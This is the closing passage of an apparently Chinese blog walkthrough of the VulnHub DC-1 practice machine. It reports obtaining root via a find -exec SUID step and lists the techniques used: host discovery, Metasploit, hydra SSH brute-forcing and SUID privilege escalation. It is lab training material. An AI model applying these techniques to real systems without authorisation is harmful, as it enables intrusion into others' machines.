<span class="token comment">#-exec 参数后面跟的是command命令，它的终止是以;为结束标志的，所以这句命令后面的分号是不可缺少的，考虑到各个系统中分号会有不同的意义，所以在分号前面加反斜杠。</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407105131125.png" alt="image-20220407105131125" loading="lazy"></p>
<p>成功拿到root权限！</p>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407105231494.png" alt="image-20220407105231494" loading="lazy"></p>
<p>成功拿到最后的flag！</p>
<blockquote>
<p>Well done!!!!</p>
<p>Hopefully you’ve enjoyed this and learned some new skills.</p>
<p>You can let me know what you thought of this little journey<br>by contacting me via Twitter - @DCAU7</p>
</blockquote>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><h2 id="学到的方法"><a href="#学到的方法" class="headerlink" title="学到的方法"></a>学到的方法</h2><ol>
<li><code>arp-scan</code>、<code>netdiscover</code>扫描存活主机。</li>
<li><a target="_blank" rel="noopener" href="http://sh1yan.top/2019/07/28/MSF-Command-Notes/">MSF常用指令</a>。</li>
<li><a target="_blank" rel="noopener" href="http://www.ha97.com/5186.html">hydra</a>爆破ssh密码。</li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/zaqzzz/p/12075132.html#1suid%E6%8F%90%E6%9D%83">suid提权</a>。</li>
</ol>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://www.extrader.top/posts/5787bcec/#">VulnHub-DC-1靶场练习</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/86b3c598a4c4">Vulnhub靶机渗透测试——DC-1</a></p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">竟然有用？！赏！！！</div><div id="qr" style="display:none;"><div style="display:inline-block"><a href="/images/Alipay.png"><img loading="lazy" src="/images/Alipay.png" alt="支付宝" title="支付宝"></a><div><span style="color:#00A3EE"><span class="icon iconify" data-icon="ri:alipay-line"></span></span></div></div><div style="display:inline-block"><a href="/images/WechatPay.png"><img loading="lazy" src="/images/WechatPay.png" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><span class="icon iconify" data-icon="ri:wechat-pay-line"></span></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Nayst</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/" title="VulnHub_DC_1">http://n4yst.github.io/2022/04/07/VulnHub-DC-1/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2022/04/07/VulnHub-DC-2/" rel="prev" title="VulnHub_DC_2"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">VulnHub_DC_2</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2022/02/28/xss/" rel="next" title="xss-跨站脚本攻击"><span class="post-nav-text">xss-跨站脚本攻击</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2022 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> Nayst</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v6.2.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.3</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:search-line"></span></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="https://fastly.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js"></script><script src="/js/search/local-search.js" defer type="module"></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><span class="icon iconify" data-icon="ri:close-line"></span></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div class="search-result-container"></div></div><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>